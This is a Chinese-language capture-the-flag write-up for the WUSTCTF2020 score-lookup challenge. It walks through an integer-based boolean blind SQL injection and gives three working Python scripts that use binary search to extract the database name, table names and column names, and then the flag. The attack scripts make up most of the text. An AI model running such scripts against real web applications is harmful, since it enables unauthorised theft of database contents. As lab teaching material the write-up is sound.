[WUSTCTF2020]颜值成绩查询

整数型注入,盲注。

速度快,一定要二分法。

爆库名:ctf

二分法核心payload

"if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="

result = ""
i = 0

while( True ):
    i = i + 1 
    head=32
    tail=127

    while( head < tail ):
        mid = (head + tail) >> 1

        payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
        r = requests.get(url+payload)
        r.encoding = "utf-8"
        #print(url+payload)
        if "your score is: 100" in r.text :
            head = mid + 1
        else:
            #print(r.text)
            tail = mid

    last = result

    if head!=32:
        result += chr(head)
    else:
        break
    print(result)

回显结果参考下图:

image-20200414224348796

爆表

flag,score

import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="

result = ""
i = 0

while( True ):
    i = i + 1 
    head=32
    tail=127

    while( head < tail ):
        mid = (head + tail) >> 1

        #payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
        payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)

        r = requests.get(url+payload)
        r.encoding = "utf-8"
        #print(url+payload)
        if "your score is: 100" in r.text :
            head = mid + 1
        else:
            #print(r.text)
            tail = mid

    last = result

    if head!=32:
        result += chr(head)
    else:
        break
    print(result)

回显结果参考下图:

image-20200414224405361

爆列名

爆出flag和value两个字段

import requests
url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="

result = ""
i = 0

while( True ):
    i = i + 1 
    head=32
    tail=127

    while( head < tail ):
        mid = (head + tail) >> 1

        #payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
        #payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
        payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid)

        r = requests.get(url+payload)
        r.encoding = "utf-8"
        #print(url+payload)
        if "your score is: 100" in r.text :
            head = mid + 1
        else:
            #print(r.text)
            tail = mid

    last = result

    if head!=32:
        result += chr(head)
    else:
        break
    print(result)

image-20200414224752972

爆信息

flag表中有flag和value两个字段

爆flag字段

爆的时候结果如下,没有给flag猜测是在value字段。

image-20200414225005339

爆value字段,发现就是在value字段了。如果没有的画要爆一下别的。

还有啊二分法,一定要二分法。不然,遇到某些题可能你爆完比赛也结束了。

image-20200414225212551